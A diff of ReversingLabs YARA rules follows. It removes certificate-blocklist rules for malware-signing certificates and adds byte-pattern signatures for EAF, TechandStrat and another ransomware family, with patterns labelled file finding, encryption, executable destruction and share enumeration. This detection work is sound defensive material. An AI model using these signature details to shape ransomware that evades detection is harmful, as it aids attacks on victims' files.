+            ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? E9
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ??
+            66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83
+        }
+		$find_files_p2 = {
+            D8 ?? 3B C6 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75
+            ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33
+            C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 BB ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 90
+            66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1
+            ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 8B FF 66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51
+            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ??
+            ?? ?? ?? 57 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ??
+            ?? ?? 52 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 8B D1 83 C4 ?? 0B D0 89 B5 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 74 ?? 50 51 8D
+            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 83 C4 ?? 3A C1 75 ?? 01 0D ?? ?? ??
+            ?? 11 35 ?? ?? ?? ?? EB ?? 01 0D ?? ?? ?? ?? 11 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51
+            53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 5E 33 CD
+            B0 ?? 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$get_logical_drives_list_p1 = {
+            8D 85 ?? ?? ?? ?? 50 57 89 BD ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
+            95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ?? 57
+            57 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ??
+            ?? ?? 83 EC ?? 8B F4 89 7E ?? C7 46 ?? ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 89
+            A5 ?? ?? ?? ?? C6 06 ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33
+            FF 89 7D ?? 83 78 ?? ?? 72 ?? 8B 00 8D 50 ?? 8D A4 24 ?? ?? ?? ?? 8A 08 40 84 C9 75
+            ?? 57 8D 8D ?? ?? ?? ?? 2B C2 51 50 83 EC ?? 8B F4 89 7E ?? C7 46 ?? ?? ?? ?? ?? BF
+            ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 A5 ?? ?? ?? ?? C6 06 ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72 ?? 8B 00 50 53 FF 15 ?? ?? ??
+            ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ??
+            ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 53 FF 15
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D 64 24 ?? 66 8B 10 66 3B 11 75 ?? 66 85
+            D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB
+        }
+		$get_logical_drives_list_p2 = {
+            1B C0 83 D8 ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 89 85 ?? ??
+            ?? ?? 89 B5 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CE D3 E2 85 95 ?? ?? ?? ?? 0F 84 ?? ?? ??
+            ?? 8D 4E ?? 66 89 8D ?? ?? ?? ?? 33 C9 6A ?? 51 8D 95 ?? ?? ?? ?? 52 C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95
+            ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
+            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ??
+            ?? 83 EC ?? B8 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? BF ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 39 78 ?? 72 ?? 8B 00 8D
+            50 ?? 8A 08 40 84 C9 75 ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 2B C2 50 83 EC ?? B8 ?? ?? ??
+            ?? 8B CC 89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            39 78 ?? 72 ?? 8B 00 50 53 FF 15 ?? ?? ?? ?? 39 BD ?? ?? ?? ?? 72 ?? 8B 95 ?? ?? ??
+            ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 B5 ?? ?? ?? ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 39 BD ?? ?? ?? ?? 72 ?? 8B 85 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 53 89 B5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C6 85 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 46 89 B5 ?? ?? ?? ?? 83
+            FE ?? 0F 8C ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? B0 ?? 8B
+            4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REGION TOURISM LLC" and pe.signatures [ i ] . serial == "5b:32:0a:2f:46:c9:9c:1b:a1:35:7b:ee" and 1602513116 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $get_logical_drives_list_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_08D4352185317271C1Cec9D05C279Af7 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_EAF : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects EAF ransomware."
 		author = "ReversingLabs"
-		id = "0165920f-5f4d-5b35-990d-120786b4c5ba"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "6903030e-b1a1-5238-b377-ce8e4b18d3f3"
+		date = "2022-07-22"
+		modified = "2022-07-22"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5598-L5614"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b240962ab23729b241413ed1e53ac6541bf6b8a673c57522efd0cfe0c7eb9dd4"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.EAF.yara#L1-L89"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3d10c852f95e8aa9bcd3543b96650b98ac57bcd2aa2b374e0badb63b5a4c0396"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "EAF"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Retalit LLC" and pe.signatures [ i ] . serial == "08:d4:35:21:85:31:72:71:c1:ce:c9:d0:5c:27:9a:f7" and 1596585601 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_B514E4C5309Ef9F27Add05Bedd4339A0 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "4b5abcfe-259e-5029-822b-c191b8d2c607"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5616-L5634"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "665b280218528bbe3d5c65d043266469e5288587ed9d85d01797bef7ce132a6f"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files_p1 = {
+            00 03 28 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 39 ?? ?? ?? ?? 00 7E ??
+            ?? ?? ?? 0C 03 28 ?? ?? ?? ?? 0D 03 28 ?? ?? ?? ?? 13 ?? 1E 8D ?? ?? ?? ?? 25 16 11 ??
+            A2 25 17 72 ?? ?? ?? ?? A2 25 18 7E ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 25 1A 28 ??
+            ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 25 1C 09 A2 25 1D 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ??
+            13 ?? 02 03 11 ?? 08 28 ?? ?? ?? ?? 13 ?? 11 ?? 2D ?? 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            2B ?? 16 13 ?? 11 ?? 2C ?? 00 00 03 11 ?? 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ?? 00
+            00 00 DE ?? 26 00 00 DE ?? 2A
+        }
+		$encrypt_files_p2 = {
+            00 03 19 73 ?? ?? ?? ?? 0A 00 04 18 73 ?? ?? ?? ?? 0B 00 06 16 6A 6F ?? ?? ?? ?? 00 28
+            ?? ?? ?? ?? 0C 00 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 05 09 73 ??
+            ?? ?? ?? 13 ?? 00 08 17 6F ?? ?? ?? ?? 00 08 18 6F ?? ?? ?? ?? 00 08 11 ?? 1F ?? 6F ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 00 08 11 ?? 1F ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 08 6F ??
+            ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 00 20 ?? ?? ?? ?? 13 ?? 11 ?? 8D ?? ?? ?? ?? 13 ?? 16
+            13 ?? 00 06 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? FE 02 16 FE 01 13
+            ?? 11 ?? 2C ?? 00 11 ?? 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 00 00 2B ?? 11 ?? 20 ?? ?? ?? ??
+            32 ?? 11 ?? 20 ?? ?? ?? ?? FE 02 16 FE 01 2B ?? 16 13 ?? 11 ?? 2C ?? 00 11 ?? 11 ?? 16
+            11 ?? 6F ?? ?? ?? ?? 00 00 2B ?? 11 ?? 20 ?? ?? ?? ?? 32 ?? 11 ?? 20 ?? ?? ?? ?? FE 02
+            16 FE 01 2B ?? 16 13 ?? 11 ?? 2C ?? 00 11 ?? 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 00 00 2B ??
+            00 07 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 11 ?? 58 13 ?? 00 11 ?? 16 FE 03 13 ??
+            11 ?? 3A ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ??
+            00 DC 00 DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 00 DE ?? 08 2C ?? 08 6F ?? ?? ??
+            ?? 00 DC 07 6F ?? ?? ?? ?? 00 00 DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 06 6F ?? ?? ??
+            ?? 00 00 DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? 00 DC 03 28 ?? ?? ?? ?? 00 17 13 ?? DE ?? 26
+            00 16 13 ?? DE ?? 11 ?? 2A
+        }
+		$find_files_p1 = {
+            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 16 0C 38 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0D 00 09 06 08 9A
+            28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 08 9A 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 09 FE 06 ??
+            ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 2C ?? 11 ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 11 ?? 7E ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 2B ?? 16 13 ?? 11 ?? 2C ?? 00 7E ?? ?? ?? ?? 06 08 9A 6F ?? ?? ?? ?? 00 00 00 08 17
+            58 0C 08 06 8E 69 FE 04 13 ?? 11 ?? 3A ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 16
+            13 ?? 2B ?? 00 07 11 ?? 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 07 11 ?? 9A 72 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 2C ?? 07 11 ?? 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 07 11 ?? 9A 72
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 2B ?? 16 13 ?? 11 ?? 2C ?? 00 07 11 ?? 9A 28 ?? ?? ?? ?? 00
+            00 00 11 ?? 17 58 13 ?? 11 ?? 07 8E 69 FE 04 13 ?? 11 ?? 2D ?? 00 DE ?? 26 00 00 DE ??
+            2A
+        }
+		$find_files_p2 = {
+            00 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 73 ?? ?? ?? ?? 0C 08 06 07 9A 7D ?? ?? ?? ?? 00 08 7B
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 08 7B ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 2B ?? 16 0D 09 2C ?? 00 08 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 00 00 00 07 17 58 0B 07 06 8E 69 32 ?? 00 DE ?? 26 00 00 DE ?? 2A
+        }
+		$destroy_exe_file = {
+            00 1F ?? 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 0B 7E ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 0C 7E ??
+            ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 08 72 ?? ?? ?? ?? 1B 8D ??
+            ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 06 A2 25 18 72 ?? ?? ?? ?? A2 25 19 28 ?? ?? ??
+            ?? A2 25 1A 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00 00
+            DE ?? 26 00 00 DE ?? 2A
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SCABONE PTY LTD" and ( pe.signatures [ i ] . serial == "00:b5:14:e4:c5:30:9e:f9:f2:7a:dd:05:be:dd:43:39:a0" or pe.signatures [ i ] . serial == "b5:14:e4:c5:30:9e:f9:f2:7a:dd:05:be:dd:43:39:a0" ) and 1572566400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $destroy_exe_file )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_13C7B92282Aae782Bfb00Baf879935F4 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Techandstrat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects TechandStrat ransomware."
 		author = "ReversingLabs"
-		id = "cc147c06-e0cf-5536-be3c-17e838b346a9"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "525d0b48-2018-5848-b9e7-def8395254eb"
+		date = "2021-05-17"
+		modified = "2021-05-17"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5636-L5652"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d4edbb446a51e5153ba88d6757d5fb610303eac3fd4bdd3b987b508dc618d2dc"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.TechandStrat.yara#L1-L106"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "80e201cf91adeee100e05af3ba5227fc61968bb6e0ce602107ba1217a7a62856"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "TechandStrat"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE WIZARD GIFT CORPORATION" and pe.signatures [ i ] . serial == "13:c7:b9:22:82:aa:e7:82:bf:b0:0b:af:87:99:35:f4" and 1603130510 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_D627F1000D12485995514Bfbdefc55D9 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "4696fc12-16b7-575f-b90f-aa0a5cc12852"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5654-L5672"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7ca590d71997879d17054a936238dd5273a52f3438d1b231a75927abfb118ffd"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$enum_shares_p1 = {
+            55 8B EC 83 EC ?? 53 56 57 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75 ?? C7 45 ?? ?? ??
+            ?? ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? 6A ?? FF
+            15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 8D 45 ?? 50 53 8D 45 ?? 50 FF
+            75 ?? FF 15 ?? ?? ?? ?? 85 C0 75
+        }
+		$enum_shares_p2 = {
+            8D 46 ?? B9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB ?? FF 36 E8 ?? ?? ?? ?? 47 83 C6 ?? 3B
+            7D ?? 72 ?? 8D 45 ?? 50 53 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53 6A
+            ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5
+            5D C2
+        }
+		$find_files = {
+            8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 53 8B 5D ??
+            56 8B 75 ?? 57 89 B5 ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ?? 51
+            53 E8 ?? ?? ?? ?? 59 59 8B C8 3B CB 75 ?? 8A 11 80 FA ?? 75 ?? 8D 43 ?? 3B C8 74 ??
+            56 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF 80 FA ?? 74 ?? 80 FA ?? 74 ??
+            80 FA ?? 74 ?? 8B C7 EB ?? 33 C0 40 0F B6 C0 2B CB 41 F7 D8 68 ?? ?? ?? ?? 1B C0 23
+            C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ??
+            ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? ?? 83 FE ?? 75 ?? 50 57
+            57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D
+            ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ??
+            ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 80 BD ??
+            ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 8B 85 ?? ?? ?? ?? 75
+            ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B FF 56 57
+            8B F9 8B 37 EB ?? FF 36 E8 ?? ?? ?? ?? 59 83 C6 ?? 3B 77 ?? 75 ?? FF 37 E8 ?? ?? ??
+            ?? 59 5F 5E C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8B 75 ?? 8D 44 24 ?? 57 50 C6 44
+            24 ?? ?? FF 36 FF 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 8B
+            44 24 ?? 81 E9 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 D8 ?? 6A ?? 6A ?? 50 51 FF 36 FF D7
+            6A ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 36 FF 15 ?? ?? ?? ??
+            81 BC 24 ?? ?? ?? ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33
+            D2 69 C0 ?? ?? ?? ?? 89 4C 24 ?? 8B 4C 24 ?? 89 8C 24 ?? ?? ?? ?? 83 C9 ?? 51 40 C7
+            44 24 ?? ?? ?? ?? ?? F7 F1 8D 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50
+            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 89 54 24 ?? 89 94
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 94 24 ??
+            ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 10 84 24 ?? ?? ?? ?? 6A ?? 6A ?? 0F
+            11 84 24 ?? ?? ?? ?? 0F 57 C0 66 0F 13 44 24 ?? 8B 44 24 ?? 50 89 44 24 ?? 8B 44 24
+            ?? 50 FF 36 89 44 24 ?? FF D7 6A ?? 8D 44 24 ?? 0F 57 C0 50 68 ?? ?? ?? ?? 8D 84 24
+            ?? ?? ?? ?? 66 0F 13 44 24 ?? 50 FF 36 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 85
+            C0 0F 84
+        }
+		$encrypt_files_p2 = {
+            6A ?? 6A ?? FF 74 24 ?? 0F 11 84 24 ?? ?? ?? ?? FF 74 24 ?? FF 36 FF 15 ?? ?? ?? ??
+            6A ?? 8D 44 24 ?? 50 FF 74 24 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 36 FF 15 ?? ?? ?? ?? 8B
+            84 24 ?? ?? ?? ?? 8B C8 85 C0 B8 ?? ?? ?? ?? 6A ?? 0F 44 C8 69 44 24 ?? ?? ?? ?? ??
+            33 D2 6A ?? 40 89 44 24 ?? F7 F1 8B 4C 24 ?? 33 C0 83 C2 ?? 13 C0 01 54 24 ?? 13 C8
+            8B 44 24 ?? 89 4C 24 ?? 0F A4 C1 ?? C1 E0 ?? 51 50 FF 36 89 4C 24 ?? 89 44 24 ?? FF
+            15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 36 FF
+            15 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84
+            24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 ?? C7 84 24 ?? ?? ??
